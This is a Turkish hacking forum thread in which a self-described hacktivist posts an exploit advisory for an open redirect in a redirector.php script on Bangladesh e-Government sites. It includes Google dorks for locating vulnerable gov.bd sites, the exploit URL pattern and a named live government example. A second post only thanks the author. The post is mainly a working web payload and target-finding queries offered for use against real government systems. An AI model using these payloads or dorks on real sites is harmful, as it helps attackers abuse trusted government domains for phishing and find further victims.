Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Technical Support A2i-Pmo BD e-Gov Open Redirect Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,356 / 1,356
Deneyim: 24 / 100
Rep Sayısı: 2708
Mesaj Sayısı: 6103
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Technical Support A2i-Pmo BD e-Gov Open Redirect Vuln
09.06.2018 19:34
################################################################################​#################

# Exploit Title : Technical Support A2i-PMO Bangladesh e-Government Open Redirection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 09/06/2018
# Vendor Homepage : a2i.pmo.gov.bd ~ a2i.gov.bd
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]

################################################################################​#################

# Google Dork 1 : intext:''কারিগরি সহায়তায় a2i"

# Google Dork 2 : inurl:''/redirector.php?url='' site:gov.bd

# Exploit : /redirector.php?url=[www.DOMAINADDRESSHERE]/&id=8e12b3a9-1145-43c5-8bbe-a415d0e58d98

################################################################################​#################

# Example Site => Bangladesh e-Government Official Site is Vulnerable for URL Redirection to Untrusted Site ('Open Redirect')

bangladesh.gov.bd/redirector.php?url=[www.DOMAINADDRESSHERE]/&id=8e12b3a9-1145-43c5-8bbe-a415d0e58d98

# Proof of Concept => archive.is/OsEaE

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.

cyberizm

Alinti
FAİLED
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 24
Yaşam Puanı: 587 / 587
Deneyim: 50 / 100
Rep Sayısı: 75
Mesaj Sayısı: 732
Üyelik Tarihi: 18.12.2017
      
Yorum: #2
Cvp: Technical Support A2i-Pmo BD e-Gov Open Redirect Vuln
11.06.2018 01:00
Teşekkürler, Emeğine Sağlık Smile
Alinti



1 Ziyaretçi